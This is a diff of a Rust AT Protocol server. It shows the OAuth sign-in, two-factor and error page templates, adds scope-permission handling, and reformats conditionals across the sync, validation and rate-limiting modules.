.account-info .handle { 241 - font-weight: 500; 242 - color: var(--text-primary); 243 - overflow: hidden; 244 - text-overflow: ellipsis; 245 - white-space: nowrap; 246 - } 247 - .account-info .did { 248 - font-size: 0.75rem; 249 - color: var(--text-muted); 250 - font-family: monospace; 251 - overflow: hidden; 252 - text-overflow: ellipsis; 253 - } 254 - .chevron { 255 - color: var(--text-muted); 256 - font-size: 1.25rem; 257 - flex-shrink: 0; 258 - margin-left: 0.5rem; 259 - } 260 - .divider { 261 - height: 1px; 262 - background: var(--border-color); 263 - margin: 1rem 0; 264 - } 265 - .new-account-link { 266 - display: block; 267 - text-align: center; 268 - color: var(--accent); 269 - text-decoration: none; 270 - font-size: 0.875rem; 271 - } 272 - .new-account-link:hover { 273 - text-decoration: underline; 274 - } 275 - .help-text { 276 - text-align: center; 277 - margin-top: 1rem; 278 - font-size: 0.875rem; 279 - color: var(--text-secondary); 280 - } 281 - .icon { 282 - font-size: 3rem; 283 - margin-bottom: 1rem; 284 - } 285 - .error-code { 286 - background: var(--error-bg); 287 - border: 1px solid var(--error-border); 288 - color: var(--error-text); 289 - padding: 0.5rem 1rem; 290 - border-radius: 4px; 291 - font-family: monospace; 292 - display: inline-block; 293 - margin-bottom: 1rem; 294 - } 295 - .success-icon { 296 - width: 3rem; 297 - height: 3rem; 298 - border-radius: 50%; 299 - background: var(--success-bg); 300 - border: 1px solid var(--success-border); 301 - color: var(--success-text); 302 - display: flex; 303 - align-items: center; 304 - justify-content: center; 305 - font-size: 1.5rem; 306 - margin: 0 auto 1rem; 307 - } 308 - .text-center { 309 - text-align: center; 310 - } 311 - .code-input { 312 - letter-spacing: 0.5em; 313 - text-align: center; 314 - font-size: 1.5rem; 315 - font-family: monospace; 316 - } 317 - "# 318 - } 319 - 320 - pub fn login_page( 321 - client_id: &str, 322 - client_name: Option<&str>, 323 - scope: Option<&str>, 324 - request_uri: &str, 325 - error_message: Option<&str>, 326 - login_hint: Option<&str>, 327 - ) -> String { 328 - let client_display = client_name.unwrap_or(client_id); 329 - let scope_display = format_scope_for_display(scope); 330 - let error_html = error_message 331 - .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 332 - .unwrap_or_default(); 333 - let login_hint_value = login_hint.unwrap_or(""); 334 - format!( 335 - r#"<!DOCTYPE html> 336 - <html lang="en"> 337 - <head> 338 - <meta charset="UTF-8"> 339 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 340 - <meta name="robots" content="noindex"> 341 - <title>Sign in</title> 342 - <style>{styles}</style> 343 - </head> 344 - <body> 345 - <div class="container"> 346 - <h1>Sign In</h1> 347 - <p class="subtitle">Sign in to continue to <strong>{client_display}</strong></p> 348 - <div class="client-info"> 349 - <span class="client-name">{client_display}</span> 350 - <span class="scope">wants to {scope_display}</span> 351 - </div> 352 - {error_html} 353 - <form method="POST" action="/oauth/authorize"> 354 - <input type="hidden" name="request_uri" value="{request_uri}"> 355 - <div class="form-group"> 356 - <label for="username">Handle</label> 357 - <input type="text" id="username" name="username" value="{login_hint_value}" 358 - required autocomplete="username" autofocus 359 - placeholder="your.handle"> 360 - </div> 361 - <div class="form-group"> 362 - <label for="password">Password</label> 363 - <input type="password" id="password" name="password" required 364 - autocomplete="current-password" placeholder="Enter your password"> 365 - </div> 366 - <div class="checkbox-group"> 367 - <input type="checkbox" id="remember_device" name="remember_device" value="true"> 368 - <label for="remember_device">Remember this device</label> 369 - </div> 370 - <div class="buttons"> 371 - <button type="submit" class="btn btn-primary">Sign In</button> 372 - <button type="submit" formaction="/oauth/authorize/deny" formnovalidate class="btn btn-secondary">Cancel</button> 373 - </div> 374 - </form> 375 - <p class="help-text"> 376 - By signing in, you agree to share your account information with this application. 377 - </p> 378 - </div> 379 - </body> 380 - </html>"#, 381 - styles = base_styles(), 382 - client_display = html_escape(client_display), 383 - scope_display = html_escape(&scope_display), 384 - request_uri = html_escape(request_uri), 385 - error_html = error_html, 386 - login_hint_value = html_escape(login_hint_value), 387 - ) 388 - } 389 - 390 - pub struct DeviceAccount { 391 - pub did: String, 392 - pub handle: String, 393 - pub email: Option<String>, 394 - pub last_used_at: DateTime<Utc>, 395 - } 396 - 397 - pub fn account_selector_page( 398 - client_id: &str, 399 - client_name: Option<&str>, 400 - request_uri: &str, 401 - accounts: &[DeviceAccount], 402 - ) -> String { 403 - let client_display = client_name.unwrap_or(client_id); 404 - let accounts_html: String = accounts 405 - .iter() 406 - .map(|account| { 407 - format!( 408 - r#"<form method="POST" action="/oauth/authorize/select" style="margin:0"> 409 - <input type="hidden" name="request_uri" value="{request_uri}"> 410 - <input type="hidden" name="did" value="{did}"> 411 - <button type="submit" class="account-item"> 412 - <div class="account-info"> 413 - <span class="handle">@{handle}</span> 414 - <span class="did">{did}</span> 415 - </div> 416 - <span class="chevron">›</span> 417 - </button> 418 - </form>"#, 419 - request_uri = html_escape(request_uri), 420 - did = html_escape(&account.did), 421 - handle = html_escape(&account.handle), 422 - ) 423 - }) 424 - .collect(); 425 - format!( 426 - r#"<!DOCTYPE html> 427 - <html lang="en"> 428 - <head> 429 - <meta charset="UTF-8"> 430 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 431 - <meta name="robots" content="noindex"> 432 - <title>Choose an account</title> 433 - <style>{styles}</style> 434 - </head> 435 - <body> 436 - <div class="container"> 437 - <h1>Sign In</h1> 438 - <p class="subtitle">Choose an account to continue to <strong>{client_display}</strong></p> 439 - <div class="accounts"> 440 - {accounts_html} 441 - </div> 442 - <div class="divider"></div> 443 - <a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link"> 444 - Sign in to another account 445 - </a> 446 - </div> 447 - </body> 448 - </html>"#, 449 - styles = base_styles(), 450 - client_display = html_escape(client_display), 451 - accounts_html = accounts_html, 452 - request_uri_encoded = urlencoding::encode(request_uri), 453 - ) 454 - } 455 - 456 - pub fn two_factor_page(request_uri: &str, channel: &str, error_message: Option<&str>) -> String { 457 - let error_html = error_message 458 - .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 459 - .unwrap_or_default(); 460 - let (title, subtitle) = match channel { 461 - "email" => ( 462 - "Check Your Email", 463 - "We sent a verification code to your email", 464 - ), 465 - "Discord" => ( 466 - "Check Discord", 467 - "We sent a verification code to your Discord", 468 - ), 469 - "Telegram" => ( 470 - "Check Telegram", 471 - "We sent a verification code to your Telegram", 472 - ), 473 - "Signal" => ("Check Signal", "We sent a verification code to your Signal"), 474 - _ => ("Check Your Messages", "We sent you a verification code"), 475 - }; 476 - format!( 477 - r#"<!DOCTYPE html> 478 - <html lang="en"> 479 - <head> 480 - <meta charset="UTF-8"> 481 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 482 - <meta name="robots" content="noindex"> 483 - <title>Verify your identity</title> 484 - <style>{styles}</style> 485 - </head> 486 - <body> 487 - <div class="container"> 488 - <h1>{title}</h1> 489 - <p class="subtitle">{subtitle}</p> 490 - {error_html} 491 - <form method="POST" action="/oauth/authorize/2fa"> 492 - <input type="hidden" name="request_uri" value="{request_uri}"> 493 - <div class="form-group"> 494 - <label for="code">Verification Code</label> 495 - <input type="text" id="code" name="code" class="code-input" 496 - placeholder="000000" 497 - pattern="[0-9]{{6}}" maxlength="6" 498 - inputmode="numeric" autocomplete="one-time-code" 499 - autofocus required> 500 - </div> 501 - <button type="submit" class="btn btn-primary" style="width:100%">Verify</button> 502 - </form> 503 - <p class="help-text"> 504 - Code expires in 10 minutes. 505 - </p> 506 - </div> 507 - </body> 508 - </html>"#, 509 - styles = base_styles(), 510 - title = title, 511 - subtitle = subtitle, 512 - request_uri = html_escape(request_uri), 513 - error_html = error_html, 514 - ) 515 - } 516 - 517 - pub fn error_page(error: &str, error_description: Option<&str>) -> String { 518 - let description = 519 - error_description.unwrap_or("An error occurred during the authorization process."); 520 - format!( 521 - r#"<!DOCTYPE html> 522 - <html lang="en"> 523 - <head> 524 - <meta charset="UTF-8"> 525 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 526 - <meta name="robots" content="noindex"> 527 - <title>Authorization Error</title> 528 - <style>{styles}</style> 529 - </head> 530 - <body> 531 - <div class="container text-center"> 532 - <h1>Authorization Failed</h1> 533 - <div class="error-code">{error}</div> 534 - <p class="subtitle" style="margin-bottom:0">{description}</p> 535 - <div style="margin-top:1.5rem"> 536 - <button onclick="window.close()" class="btn btn-secondary" style="width:100%">Close this window</button> 537 - </div> 538 - </div> 539 - </body> 540 - </html>"#, 541 - styles = base_styles(), 542 - error = html_escape(error), 543 - description = html_escape(description), 544 - ) 545 - } 546 - 547 - pub fn success_page(client_name: Option<&str>) -> String { 548 - let client_display = client_name.unwrap_or("The application"); 549 - format!( 550 - r#"<!DOCTYPE html> 551 - <html lang="en"> 552 - <head> 553 - <meta charset="UTF-8"> 554 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 555 - <meta name="robots" content="noindex"> 556 - <title>Authorization Successful</title> 557 - <style>{styles}</style> 558 - </head> 559 - <body> 560 - <div class="container text-center"> 561 - <div class="success-icon">✓</div> 562 - <h1 style="color:var(--success-text)">Authorization Successful</h1> 563 - <p class="subtitle">{client_display} has been granted access to your account.</p> 564 - <p class="help-text">You can close this window and return to the application.</p> 565 - </div> 566 - </body> 567 - </html>"#, 568 - styles = base_styles(), 569 - client_display = html_escape(client_display), 570 - ) 571 - } 572 - 573 - fn html_escape(s: &str) -> String { 574 - s.replace('&', "&amp;") 575 - .replace('<', "&lt;") 576 - .replace('>', "&gt;") 577 - .replace('"', "&quot;") 578 - .replace('\'', "&#39;") 579 - } 580 - 581 - pub fn mask_email(email: &str) -> String { 582 - if let Some(at_pos) = email.find('@') { 583 - let local = &email[..at_pos]; 584 - let domain = &email[at_pos..]; 585 - if local.len() <= 2 { 586 - format!("{}***{}", local.chars().next().unwrap_or('*'), domain) 587 - } else { 588 - let first = local.chars().next().unwrap_or('*'); 589 - let last = local.chars().last().unwrap_or('*'); 590 - format!("{}***{}{}", first, last, domain) 591 - } 592 - } else { 593 - "***".to_string() 594 - } 595 - }
···
+1
src/oauth/types.rs
··· 91 pub state: Option<String>, 92 pub code_challenge: String, 93 pub code_challenge_method: String, 94 pub login_hint: Option<String>, 95 pub dpop_jkt: Option<String>, 96 #[serde(flatten)]
··· 91 pub state: Option<String>, 92 pub code_challenge: String, 93 pub code_challenge_method: String, 94 + pub response_mode: Option<String>, 95 pub login_hint: Option<String>, 96 pub dpop_jkt: Option<String>, 97 #[serde(flatten)]
+13 -6
src/oauth/verify.rs
··· 14 use super::OAuthError; 15 use super::db; 16 use super::dpop::DPoPVerifier; 17 use crate::config::AuthConfig; 18 use crate::state::AppState; 19 ··· 175 pub client_id: Option<String>, 176 pub scope: Option<String>, 177 pub is_oauth: bool, 178 } 179 180 pub struct OAuthAuthError { ··· 244 client_id: None, 245 scope: None, 246 is_oauth: false, 247 }); 248 } 249 let http_method = parts.method.as_str(); 250 let http_uri = parts.uri.to_string(); 251 match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await 252 { 253 - Ok(result) => Ok(OAuthUser { 254 - did: result.did, 255 - client_id: Some(result.client_id), 256 - scope: result.scope, 257 - is_oauth: true, 258 - }), 259 Err(OAuthError::UseDpopNonce(nonce)) => Err(OAuthAuthError { 260 status: StatusCode::UNAUTHORIZED, 261 error: "use_dpop_nonce".to_string(),
··· 14 use super::OAuthError; 15 use super::db; 16 use super::dpop::DPoPVerifier; 17 + use super::scopes::ScopePermissions; 18 use crate::config::AuthConfig; 19 use crate::state::AppState; 20 ··· 176 pub client_id: Option<String>, 177 pub scope: Option<String>, 178 pub is_oauth: bool, 179 + pub permissions: ScopePermissions, 180 } 181 182 pub struct OAuthAuthError { ··· 246 client_id: None, 247 scope: None, 248 is_oauth: false, 249 + permissions: ScopePermissions::default(), 250 }); 251 } 252 let http_method = parts.method.as_str(); 253 let http_uri = parts.uri.to_string(); 254 match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await 255 { 256 + Ok(result) => { 257 + let permissions = ScopePermissions::from_scope_string(result.scope.as_deref()); 258 + Ok(OAuthUser { 259 + did: result.did, 260 + client_id: Some(result.client_id), 261 + scope: result.scope, 262 + is_oauth: true, 263 + permissions, 264 + }) 265 + } 266 Err(OAuthError::UseDpopNonce(nonce)) => Err(OAuthAuthError { 267 status: StatusCode::UNAUTHORIZED, 268 error: "use_dpop_nonce".to_string(),
+6 -5
src/plc/mod.rs
··· 408 PlcError::InvalidResponse("verificationMethods must be an object".to_string()) 409 })?; 410 if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 411 - && atproto_key != ctx.expected_signing_key { 412 - return Err(PlcError::InvalidResponse( 413 - "Incorrect signing key".to_string(), 414 - )); 415 - } 416 let also_known_as = obj 417 .get("alsoKnownAs") 418 .and_then(|v| v.as_array())
··· 408 PlcError::InvalidResponse("verificationMethods must be an object".to_string()) 409 })?; 410 if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 411 + && atproto_key != ctx.expected_signing_key 412 + { 413 + return Err(PlcError::InvalidResponse( 414 + "Incorrect signing key".to_string(), 415 + )); 416 + } 417 let also_known_as = obj 418 .get("alsoKnownAs") 419 .and_then(|v| v.as_array())
+8 -6
src/rate_limit.rs
··· 122 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 123 if let Some(forwarded) = headers.get("x-forwarded-for") 124 && let Ok(value) = forwarded.to_str() 125 - && let Some(first_ip) = value.split(',').next() { 126 - return first_ip.trim().to_string(); 127 - } 128 129 if let Some(real_ip) = headers.get("x-real-ip") 130 - && let Ok(value) = real_ip.to_str() { 131 - return value.trim().to_string(); 132 - } 133 134 addr.map(|a| a.ip().to_string()) 135 .unwrap_or_else(|| "unknown".to_string())
··· 122 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 123 if let Some(forwarded) = headers.get("x-forwarded-for") 124 && let Ok(value) = forwarded.to_str() 125 + && let Some(first_ip) = value.split(',').next() 126 + { 127 + return first_ip.trim().to_string(); 128 + } 129 130 if let Some(real_ip) = headers.get("x-real-ip") 131 + && let Ok(value) = real_ip.to_str() 132 + { 133 + return value.trim().to_string(); 134 + } 135 136 addr.map(|a| a.ip().to_string()) 137 .unwrap_or_else(|| "unknown".to_string())
+45 -42
src/sync/import.rs
··· 77 Ipld::Map(obj) => { 78 if let Some(Ipld::String(type_str)) = obj.get("$type") 79 && type_str == "blob" 80 - && let Some(Ipld::Link(link_cid)) = obj.get("ref") { 81 - let mime = obj.get("mimeType").and_then(|v| { 82 - if let Ipld::String(s) = v { 83 - Some(s.clone()) 84 - } else { 85 - None 86 - } 87 - }); 88 - return vec![BlobRef { 89 - cid: link_cid.to_string(), 90 - mime_type: mime, 91 - }]; 92 } 93 obj.values() 94 .flat_map(|v| find_blob_refs_ipld(v, depth + 1)) 95 .collect() ··· 110 JsonValue::Object(obj) => { 111 if let Some(JsonValue::String(type_str)) = obj.get("$type") 112 && type_str == "blob" 113 - && let Some(JsonValue::Object(ref_obj)) = obj.get("ref") 114 - && let Some(JsonValue::String(link)) = ref_obj.get("$link") { 115 - let mime = obj 116 - .get("mimeType") 117 - .and_then(|v| v.as_str()) 118 - .map(String::from); 119 - return vec![BlobRef { 120 - cid: link.clone(), 121 - mime_type: mime, 122 - }]; 123 - } 124 obj.values() 125 .flat_map(|v| find_blob_refs(v, depth + 1)) 126 .collect() ··· 195 }); 196 if let (Some(key), Some(record_cid)) = (key, record_cid) 197 && let Some(record_block) = blocks.get(&record_cid) 198 - && let Ok(record_value) = 199 - serde_ipld_dagcbor::from_slice::<Ipld>(record_block) 200 - { 201 - let blob_refs = find_blob_refs_ipld(&record_value, 0); 202 - let parts: Vec<&str> = key.split('/').collect(); 203 - if parts.len() >= 2 { 204 - let collection = parts[..parts.len() - 1].join("/"); 205 - let rkey = parts[parts.len() - 1].to_string(); 206 - records.push(ImportedRecord { 207 - collection, 208 - rkey, 209 - cid: record_cid, 210 - blob_refs, 211 - }); 212 - } 213 - } 214 if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") { 215 stack.push(*tree_cid); 216 } ··· 300 .await 301 .map_err(|e| { 302 if let sqlx::Error::Database(ref db_err) = e 303 - && db_err.code().as_deref() == Some("55P03") { 304 - return ImportError::ConcurrentModification; 305 - } 306 ImportError::Database(e) 307 })?; 308 if repo.is_none() {
··· 77 Ipld::Map(obj) => { 78 if let Some(Ipld::String(type_str)) = obj.get("$type") 79 && type_str == "blob" 80 + && let Some(Ipld::Link(link_cid)) = obj.get("ref") 81 + { 82 + let mime = obj.get("mimeType").and_then(|v| { 83 + if let Ipld::String(s) = v { 84 + Some(s.clone()) 85 + } else { 86 + None 87 } 88 + }); 89 + return vec![BlobRef { 90 + cid: link_cid.to_string(), 91 + mime_type: mime, 92 + }]; 93 + } 94 obj.values() 95 .flat_map(|v| find_blob_refs_ipld(v, depth + 1)) 96 .collect() ··· 111 JsonValue::Object(obj) => { 112 if let Some(JsonValue::String(type_str)) = obj.get("$type") 113 && type_str == "blob" 114 + && let Some(JsonValue::Object(ref_obj)) = obj.get("ref") 115 + && let Some(JsonValue::String(link)) = ref_obj.get("$link") 116 + { 117 + let mime = obj 118 + .get("mimeType") 119 + .and_then(|v| v.as_str()) 120 + .map(String::from); 121 + return vec![BlobRef { 122 + cid: link.clone(), 123 + mime_type: mime, 124 + }]; 125 + } 126 obj.values() 127 .flat_map(|v| find_blob_refs(v, depth + 1)) 128 .collect() ··· 197 }); 198 if let (Some(key), Some(record_cid)) = (key, record_cid) 199 && let Some(record_block) = blocks.get(&record_cid) 200 + && let Ok(record_value) = 201 + serde_ipld_dagcbor::from_slice::<Ipld>(record_block) 202 + { 203 + let blob_refs = find_blob_refs_ipld(&record_value, 0); 204 + let parts: Vec<&str> = key.split('/').collect(); 205 + if parts.len() >= 2 { 206 + let collection = parts[..parts.len() - 1].join("/"); 207 + let rkey = parts[parts.len() - 1].to_string(); 208 + records.push(ImportedRecord { 209 + collection, 210 + rkey, 211 + cid: record_cid, 212 + blob_refs, 213 + }); 214 + } 215 + } 216 if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") { 217 stack.push(*tree_cid); 218 } ··· 302 .await 303 .map_err(|e| { 304 if let sqlx::Error::Database(ref db_err) = e 305 + && db_err.code().as_deref() == Some("55P03") 306 + { 307 + return ImportError::ConcurrentModification; 308 + } 309 ImportError::Database(e) 310 })?; 311 if repo.is_none() {
+28 -21
src/sync/util.rs
··· 140 .try_into() 141 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 142 if let Some(ref pdc) = prev_data_cid_str 143 - && let Ok(cid) = Cid::from_str(pdc) { 144 - frame.prev_data = Some(cid); 145 - } 146 let commit_cid = frame.commit; 147 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 148 let mut all_cids: Vec<Cid> = block_cids_str ··· 155 } 156 if let Some(ref pc) = prev_cid 157 && let Ok(Some(prev_bytes)) = state.block_store.get(pc).await 158 - && let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) { 159 - frame.since = Some(rev); 160 - } 161 let car_bytes = if !all_cids.is_empty() { 162 let fetched = state.block_store.get_many(&all_cids).await?; 163 let mut blocks = std::collections::BTreeMap::new(); ··· 196 let mut all_cids: Vec<Cid> = Vec::new(); 197 for event in events { 198 if let Some(ref commit_cid_str) = event.commit_cid 199 - && let Ok(cid) = Cid::from_str(commit_cid_str) { 200 - all_cids.push(cid); 201 - } 202 if let Some(ref prev_cid_str) = event.prev_cid 203 - && let Ok(cid) = Cid::from_str(prev_cid_str) { 204 - all_cids.push(cid); 205 - } 206 if let Some(ref block_cids_str) = event.blocks_cids { 207 for s in block_cids_str { 208 if let Ok(cid) = Cid::from_str(s) { ··· 279 .try_into() 280 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 281 if let Some(ref pdc) = prev_data_cid_str 282 - && let Ok(cid) = Cid::from_str(pdc) { 283 - frame.prev_data = Some(cid); 284 - } 285 let commit_cid = frame.commit; 286 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 287 let mut all_cids: Vec<Cid> = block_cids_str ··· 293 all_cids.push(commit_cid); 294 } 295 if let Some(commit_bytes) = prefetched.get(&commit_cid) 296 - && let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) { 297 - frame.rev = rev; 298 - } 299 if let Some(ref pc) = prev_cid 300 && let Some(prev_bytes) = prefetched.get(pc) 301 - && let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) { 302 - frame.since = Some(rev); 303 - } 304 let car_bytes = if !all_cids.is_empty() { 305 let mut blocks = BTreeMap::new(); 306 let mut commit_bytes_for_car: Option<Bytes> = None;
··· 140 .try_into() 141 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 142 if let Some(ref pdc) = prev_data_cid_str 143 + && let Ok(cid) = Cid::from_str(pdc) 144 + { 145 + frame.prev_data = Some(cid); 146 + } 147 let commit_cid = frame.commit; 148 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 149 let mut all_cids: Vec<Cid> = block_cids_str ··· 156 } 157 if let Some(ref pc) = prev_cid 158 && let Ok(Some(prev_bytes)) = state.block_store.get(pc).await 159 + && let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) 160 + { 161 + frame.since = Some(rev); 162 + } 163 let car_bytes = if !all_cids.is_empty() { 164 let fetched = state.block_store.get_many(&all_cids).await?; 165 let mut blocks = std::collections::BTreeMap::new(); ··· 198 let mut all_cids: Vec<Cid> = Vec::new(); 199 for event in events { 200 if let Some(ref commit_cid_str) = event.commit_cid 201 + && let Ok(cid) = Cid::from_str(commit_cid_str) 202 + { 203 + all_cids.push(cid); 204 + } 205 if let Some(ref prev_cid_str) = event.prev_cid 206 + && let Ok(cid) = Cid::from_str(prev_cid_str) 207 + { 208 + all_cids.push(cid); 209 + } 210 if let Some(ref block_cids_str) = event.blocks_cids { 211 for s in block_cids_str { 212 if let Ok(cid) = Cid::from_str(s) { ··· 283 .try_into() 284 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 285 if let Some(ref pdc) = prev_data_cid_str 286 + && let Ok(cid) = Cid::from_str(pdc) 287 + { 288 + frame.prev_data = Some(cid); 289 + } 290 let commit_cid = frame.commit; 291 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 292 let mut all_cids: Vec<Cid> = block_cids_str ··· 298 all_cids.push(commit_cid); 299 } 300 if let Some(commit_bytes) = prefetched.get(&commit_cid) 301 + && let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) 302 + { 303 + frame.rev = rev; 304 + } 305 if let Some(ref pc) = prev_cid 306 && let Some(prev_bytes) = prefetched.get(pc) 307 + && let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) 308 + { 309 + frame.since = Some(rev); 310 + } 311 let car_bytes = if !all_cids.is_empty() { 312 let mut blocks = BTreeMap::new(); 313 let mut commit_bytes_for_car: Option<Bytes> = None;
+7 -6
src/sync/verify.rs
··· 268 stack.push(*tree_cid); 269 } 270 if let Some(Ipld::Link(value_cid)) = entry_obj.get("v") 271 - && !blocks.contains_key(value_cid) { 272 - warn!( 273 - "Record block {} referenced in MST not in CAR (may be expected for partial export)", 274 - value_cid 275 - ); 276 - } 277 } 278 } 279 }
··· 268 stack.push(*tree_cid); 269 } 270 if let Some(Ipld::Link(value_cid)) = entry_obj.get("v") 271 + && !blocks.contains_key(value_cid) 272 + { 273 + warn!( 274 + "Record block {} referenced in MST not in CAR (may be expected for partial export)", 275 + value_cid 276 + ); 277 + } 278 } 279 } 280 }
+49 -42
src/validation/mod.rs
··· 111 } 112 } 113 if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) 114 - && langs.len() > 3 { 115 - return Err(ValidationError::InvalidField { 116 - path: "langs".to_string(), 117 - message: "Maximum 3 languages allowed".to_string(), 118 - }); 119 - } 120 if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) { 121 if tags.len() > 8 { 122 return Err(ValidationError::InvalidField { ··· 126 } 127 for (i, tag) in tags.iter().enumerate() { 128 if let Some(tag_str) = tag.as_str() 129 - && tag_str.len() > 640 { 130 - return Err(ValidationError::InvalidField { 131 - path: format!("tags/{}", i), 132 - message: "Tag exceeds maximum length of 640 bytes".to_string(), 133 - }); 134 - } 135 } 136 } 137 Ok(()) ··· 198 return Err(ValidationError::MissingField("createdAt".to_string())); 199 } 200 if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 201 - && !subject.starts_with("did:") { 202 - return Err(ValidationError::InvalidField { 203 - path: "subject".to_string(), 204 - message: "Subject must be a DID".to_string(), 205 - }); 206 - } 207 Ok(()) 208 } 209 ··· 215 return Err(ValidationError::MissingField("createdAt".to_string())); 216 } 217 if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 218 - && !subject.starts_with("did:") { 219 - return Err(ValidationError::InvalidField { 220 - path: "subject".to_string(), 221 - message: "Subject must be a DID".to_string(), 222 - }); 223 - } 224 Ok(()) 225 } 226 ··· 235 return Err(ValidationError::MissingField("createdAt".to_string())); 236 } 237 if let Some(name) = obj.get("name").and_then(|v| v.as_str()) 238 - && (name.is_empty() || name.len() > 64) { 239 - return Err(ValidationError::InvalidField { 240 - path: "name".to_string(), 241 - message: "Name must be 1-64 characters".to_string(), 242 - }); 243 - } 244 Ok(()) 245 } 246 ··· 274 return Err(ValidationError::MissingField("createdAt".to_string())); 275 } 276 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) 277 - && (display_name.is_empty() || display_name.len() > 240) { 278 - return Err(ValidationError::InvalidField { 279 - path: "displayName".to_string(), 280 - message: "displayName must be 1-240 characters".to_string(), 281 - }); 282 - } 283 Ok(()) 284 } 285 ··· 328 return Err(ValidationError::MissingField(format!("{}/cid", path))); 329 } 330 if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) 331 - && !uri.starts_with("at://") { 332 - return Err(ValidationError::InvalidField { 333 - path: format!("{}/uri", path), 334 - message: "URI must be an at:// URI".to_string(), 335 - }); 336 - } 337 Ok(()) 338 } 339 }
··· 111 } 112 } 113 if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) 114 + && langs.len() > 3 115 + { 116 + return Err(ValidationError::InvalidField { 117 + path: "langs".to_string(), 118 + message: "Maximum 3 languages allowed".to_string(), 119 + }); 120 + } 121 if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) { 122 if tags.len() > 8 { 123 return Err(ValidationError::InvalidField { ··· 127 } 128 for (i, tag) in tags.iter().enumerate() { 129 if let Some(tag_str) = tag.as_str() 130 + && tag_str.len() > 640 131 + { 132 + return Err(ValidationError::InvalidField { 133 + path: format!("tags/{}", i), 134 + message: "Tag exceeds maximum length of 640 bytes".to_string(), 135 + }); 136 + } 137 } 138 } 139 Ok(()) ··· 200 return Err(ValidationError::MissingField("createdAt".to_string())); 201 } 202 if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 203 + && !subject.starts_with("did:") 204 + { 205 + return Err(ValidationError::InvalidField { 206 + path: "subject".to_string(), 207 + message: "Subject must be a DID".to_string(), 208 + }); 209 + } 210 Ok(()) 211 } 212 ··· 218 return Err(ValidationError::MissingField("createdAt".to_string())); 219 } 220 if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 221 + && !subject.starts_with("did:") 222 + { 223 + return Err(ValidationError::InvalidField { 224 + path: "subject".to_string(), 225 + message: "Subject must be a DID".to_string(), 226 + }); 227 + } 228 Ok(()) 229 } 230 ··· 239 return Err(ValidationError::MissingField("createdAt".to_string())); 240 } 241 if let Some(name) = obj.get("name").and_then(|v| v.as_str()) 242 + && (name.is_empty() || name.len() > 64) 243 + { 244 + return Err(ValidationError::InvalidField { 245 + path: "name".to_string(), 246 + message: "Name must be 1-64 characters".to_string(), 247 + }); 248 + } 249 Ok(()) 250 } 251 ··· 279 return Err(ValidationError::MissingField("createdAt".to_string())); 280 } 281 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) 282 + && (display_name.is_empty() || display_name.len() > 240) 283 + { 284 + return Err(ValidationError::InvalidField { 285 + path: "displayName".to_string(), 286 + message: "displayName must be 1-240 characters".to_string(), 287 + }); 288 + } 289 Ok(()) 290 } 291 ··· 334 return Err(ValidationError::MissingField(format!("{}/cid", path))); 335 } 336 if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) 337 + && !uri.starts_with("at://") 338 + { 339 + return Err(ValidationError::InvalidField { 340 + path: format!("{}/uri", path), 341 + message: "URI must be an at:// URI".to_string(), 342 + }); 343 + } 344 Ok(()) 345 } 346 }
+56 -14
tests/account_notifications.rs
